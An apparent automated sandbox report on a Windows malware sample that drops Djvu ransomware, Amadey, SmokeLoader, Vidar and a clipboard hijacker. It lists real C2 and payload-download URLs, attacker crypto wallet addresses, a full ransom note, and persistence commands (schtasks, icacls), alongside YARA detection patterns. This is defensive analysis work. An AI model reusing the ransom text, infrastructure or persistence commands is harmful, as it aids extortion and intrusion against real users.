Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	891767
MD5:	22db1211ad126909ed458baa3bc4c424
SHA1:	614f8a0c23210f5a83854262042425c511a99999
SHA256:	0e2bf57a9ed2f7ac44d5a2c551ab8a88a677e59a894dadce533fc2f92c6f7686
Tags:	exe
Infos:

Detection

Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, PrivateLoader, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Found ransom note / readme

Yara detected Babuk Ransomware

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Yara detected Clipboard Hijacker

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Fabookie

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected PrivateLoader

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Injects a PE file into a foreign processes

Deletes itself after installation

Writes a notice file (html or txt) to demand a ransom

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE file contains more sections than normal

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Uses cacls to modify the permissions of files

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

System is w10x64

file.exe (PID: 7328 cmdline: C:\Users\user\Desktop\file.exe MD5: 22DB1211AD126909ED458BAA3BC4C424)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

759F.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\Temp\759F.exe MD5: 836FDB5D06415C4815B4962D5C5316A5)

759F.exe (PID: 7656 cmdline: C:\Users\user\AppData\Local\Temp\759F.exe MD5: 836FDB5D06415C4815B4962D5C5316A5)

icacls.exe (PID: 7716 cmdline: icacls "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)

759F.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask MD5: 836FDB5D06415C4815B4962D5C5316A5)

759F.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask MD5: 836FDB5D06415C4815B4962D5C5316A5)

6C74.exe (PID: 7764 cmdline: C:\Users\user\AppData\Local\Temp\6C74.exe MD5: 836FDB5D06415C4815B4962D5C5316A5)

6C74.exe (PID: 7824 cmdline: C:\Users\user\AppData\Local\Temp\6C74.exe MD5: 836FDB5D06415C4815B4962D5C5316A5)

6C74.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask MD5: 836FDB5D06415C4815B4962D5C5316A5)

6C74.exe (PID: 3676 cmdline: "C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask MD5: 836FDB5D06415C4815B4962D5C5316A5)

build2.exe (PID: 5036 cmdline: "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe" MD5: B7133C4070082747C60BF6191A5F70DE)

build2.exe (PID: 5012 cmdline: "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe" MD5: B7133C4070082747C60BF6191A5F70DE)

build3.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe" MD5: 9EAD10C08E72AE41921191F8DB39BC16)

schtasks.exe (PID: 2064 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dllhost.exe (PID: 7804 cmdline: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} MD5: 2528137C6745C4EADD87817A1909677E)

consent.exe (PID: 8064 cmdline: consent.exe 4776 442 0000022BAEE1B7D0 MD5: 74D31E4F51873160D91B1F80E0C472D0)

C2B9.exe (PID: 8124 cmdline: C:\Users\user\AppData\Local\Temp\C2B9.exe MD5: B1C532EE300B4D54DC95FA6DE7406870)

AF5C.exe (PID: 8152 cmdline: C:\Users\user\AppData\Local\Temp\AF5C.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

AF5C.exe (PID: 7180 cmdline: C:\Users\user\AppData\Local\Temp\AF5C.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

9B15.exe (PID: 5172 cmdline: C:\Users\user\AppData\Local\Temp\9B15.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

9B15.exe (PID: 3312 cmdline: C:\Users\user\AppData\Local\Temp\9B15.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

86ED.exe (PID: 2300 cmdline: C:\Users\user\AppData\Local\Temp\86ED.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

86ED.exe (PID: 1476 cmdline: C:\Users\user\AppData\Local\Temp\86ED.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

E8B1.exe (PID: 7184 cmdline: C:\Users\user\AppData\Local\Temp\E8B1.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

E8B1.exe (PID: 7356 cmdline: C:\Users\user\AppData\Local\Temp\E8B1.exe MD5: 975AFF0E2D4CC02478D7ED11A94354FD)

759F.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart MD5: 836FDB5D06415C4815B4962D5C5316A5)

759F.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart MD5: 836FDB5D06415C4815B4962D5C5316A5)

6000.exe (PID: 7420 cmdline: C:\Users\user\AppData\Local\Temp\6000.exe MD5: 836FDB5D06415C4815B4962D5C5316A5)

6000.exe (PID: 7384 cmdline: C:\Users\user\AppData\Local\Temp\6000.exe MD5: 836FDB5D06415C4815B4962D5C5316A5)

D5B9.exe (PID: 7524 cmdline: C:\Users\user\AppData\Local\Temp\D5B9.exe MD5: 4E40E00BE3370FB1F562B1E09E1275C1)

759F.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart MD5: 836FDB5D06415C4815B4962D5C5316A5)

rrjthgj (PID: 7616 cmdline: C:\Users\user\AppData\Roaming\rrjthgj MD5: 22DB1211AD126909ED458BAA3BC4C424)

759F.exe (PID: 7744 cmdline: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task MD5: 836FDB5D06415C4815B4962D5C5316A5)

759F.exe (PID: 7864 cmdline: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task MD5: 836FDB5D06415C4815B4962D5C5316A5)

mstsca.exe (PID: 4744 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 9EAD10C08E72AE41921191F8DB39BC16)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/ https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Fabookie	Fabookie is facebook account info stealer.	No Attribution	https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/ https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1	https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie

Name	Description	Attribution	Blogpost URLs	Link
PrivateLoader	According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.	No Attribution	https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise https://intel471.com/blog/privateloader-malware	https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: Amadey

{"C2 url": "5.42.65.80/8bmeVwqx/index.php", "Version": "3.83"}

Threatname: Clipboard Hijacker

{"Crypto Addresses": ["LLiNjWA9h4LxVtDigLQ79xQdGiJYC4oHis", "DBbgRYaKG993LFJKCWz73PZqveWsnwRmGc", "3NLzE3tXwoagBrgFsjNNkPZfrESydTD8JP", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "t1VQgJMcNsBHsDyu1tXmJZjDpgbm3ftmTGN", "42UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoSFUfCQN6Xm37LBZZ6qNBorFw3b6s2", "addr1qx4jwm700r2w6fneakg0r5pkg76vu7qkt6qv7zxza3qu3w9tyahu77x5a5n8nmvs78grv3a5eeupvh5qeuyv9mzpezuq60zykl", "1My2QNmVqkvN5M13xk8DWftjwC9G1F2w8Z", "MBD2C8QV7RDrNtSDRe9B2iH5r7yH4iMcxk", "ltc1qa5lae8k7tzcw5lcjfvfs3n0nhf0z3cgrsz2dym", "bnb136ns6lfw4zs5hg4n85vdthaad7hq5m4gtkgf23", "0xa6360e294DfCe4fE4Edf61b170c76770691aA111", "bc1qx8vykfse9s9llguez9cuyjmy092yeqkesl2r5v", "89SPVUAPHDLSq5pRdf8Eo6SLnKRJ8BNSYYnvPL6iJxGP4FBCBmkeV3CTSLCbk6uydxRnub4gLH6TBRycxSAQN2m1KcnhrSZ"]}

Threatname: Djvu

{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-vKvLYNOV9o\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0730JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsdHlZ0R9kUzaJ+ON77QV\\\\nmgKExLc0prqBwjshvRgq2ZwBS2V1mj1qzHZERiUSevCe2OSN0SXJ9zRW58+iIsUc\\\\nBre\\/TbNUe3Hmr2go0ggfRN\\/VQV3++uyb0wsvdaAifhKWProwmI5+1ZnbK6SqNQH+\\\\nuvASfEzuOVjjAU9ueJHmeaAvTPdP6EHKW6OmmeDCKF7DCmp73mvrQ3ROr4\\/0zyZ2\\\\nhTDX7QEh23SL9t9PBy98KtriMGECMXml8VnRAn4eYzvR\\/NSjJJEccu6gl3+XpS0W\\\\nxNw4cmbW0\\/WxL8+kVmZu3AQXkaoOohHROkxlapYGWMKypcr8Gp\\/YcHyTP6LVqR3K\\\\n9QIDAQAB\\\\n-----END PUBLIC KEY-----"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199235044780", "https://t.me/headlist"], "Botnet": "153ce668f1e21829c936c2b11fa4d869", "Version": "4.4"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x6a6b5a:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 0x17e6765:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 0x1850d50:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
dump.pcap	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6a6851:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x17e645c:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1850a47:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x6a68de:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x17e64e9:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1850ad4:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x6a68de:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x17e64e9:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1850ad4:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x6a6c04:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x17e680f:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1850dfa:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x6a6cd2:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ... 0x17e6929:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ... 0x1850ec8:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
